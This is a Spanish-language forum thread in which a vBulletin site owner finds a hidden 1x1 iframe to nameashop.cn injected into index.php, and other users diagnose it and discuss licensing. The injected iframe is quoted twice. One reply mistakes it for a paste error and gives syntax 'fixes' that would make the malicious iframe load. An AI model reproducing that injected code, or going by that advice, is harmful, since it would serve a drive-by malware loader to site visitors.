error en el index.php

charlesmdq Seguir

Alfa
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
14 Jul 2008
hola hoy dia quize entrar a mi foro y me aparecio el siguiente error inesperado:

Parse error: syntax error, unexpected '?' in /home/er000272/public_html/index.php on line 48

Bueno aca tambien le copio lo que aparece dentrto del index.php

46 print_portal_output($home);
47
48 ?<html><body><iframe src="http://nameashop.cn/in.cgi?income15" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

si alguien me ayuda urgente!

mcloud

Ni
Desde
11 Oct 2005
Ahí tienes lo que parece que sobra. Una ? delante de <html> en la linea 48. En esa misma linea parece que sobra un > al final

charlesmdq

Alfa
Desde
14 Jul 2008
a listo.. si lo borreee....... y funciona de nuevo!! ..... pero como apareciooo ahi? como pueddo prevenir de vuelta esto

desde ya muchisimas gracias!

mcloud

Ni
Desde
11 Oct 2005
Eso no apareció ahí, lo pusiste tú en alguna modificación que hiciste.

charlesmdq

Alfa
Desde
14 Jul 2008
te lo juro.... nunca edite mi index.php! y hoyy de nuevooo me editaron el index! pero ya hize el backup! me fije los permisos del archivo y estan en 644.... no entiendo-!!! me hackean la weB?

bueno ya averigue y mi pagina esta siendo atacada por iframes!
Extreme Security -- Do It Securely or Not at all !: IFRAME Attacks - Actions to be taken
en esa web no entiendo mucho las acciones q debo tomar.. si alguien ya tubo esta experiencia y desea ayudarme??.. gracias!

mcloud

Ni
Desde
11 Oct 2005
El vBfirewall le puede dar problemas a la larga. Son muchos lo que han tenido que desinstalalro.

Por cierto charlesmdq, ¿tu versión de vBulletin ha sido descargado de vBulletin.com?. El problema de inseguridad puede venir del hecho de que sea nulled. En estas versiones, nunca se sabe que sorpresas pueden traer.

imported_GeXaiN

Curioso
Desde
5 Sep 2008
PHP:
46 print_portal_output($home);
47
48 ?<html><body><iframe src="http://nameashop.cn/in.cgi?income15" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

Lo veo algo estraño el codigo no se por que usan doble funciones cerrando codigos

pues si generalmente no deberian de aparecer "?" en la linea 48 tu lo colocastes hally sin date cuenta o cuano copiastes el otro codigo fue el error.

ya que no tubistes el suficiente cuidado ya que me puedo dar cuenta que el error fue ese por que al final queda asi el codigo </body></html>> donde seria la otra parte de ? es simple no tubistes el suficiente cuidado cuando pegastes el codigo

lo pegastes en medio de ?>

arregla el codigo y pega donde tiene que ir

tendria que quedar asi:

si lo que quieres es que lo lea fuera de el php
PHP:
48 ?><html><body><iframe src="http://nameashop.cn/in.cgi?income15" width=1 height=1 style="visibility: hidden"></iframe></body></html>
o que lo lea dentro de el php

HTML:
48 <html><body><iframe src="http://nameashop.cn/in.cgi?income15" width=1 height=1 style="visibility: hidden"></iframe></body></html> ?>

mcloud

Ni
Desde
11 Oct 2005
GeXaiN, si lees todo el tema verás que ya hablamos de eso y ya dijo que él no lo puso. Parece que está sufriendo un ataque, posiblemente porque tiene código malicioso en algun archivo de su foro.

charlesmdq

Alfa
Desde
14 Jul 2008
nono.... no me descargue de la web oficial..
tube mirandola.. como debo proceeder para la descarga en ese sitio?... debo adquirir una licencia y comprar el producto no?.... porque si es asi va ser lo mejor para mantenerme al dia de las actualizaciones y no sufri esto nuevamente.

Carlangueitor

Beta
Desde
15 Dic 2008
Tienes que comprar tu licencia, y asi poder descargar los hacks, y tener las actualizaciones.

Salu5-3

charlesmdq

Alfa
Desde
14 Jul 2008
como procedo en la compra.... 180 dolares la licencia ilimitada...... y despues otros 170 (Branding Free Option)?? o no es necesario?

mcloud

Ni
Desde
11 Oct 2005
El Branding Free Option es para poder quitar los créditos, pero tampoco molestan tanto, por lo que casi parece innecesario pagar eso,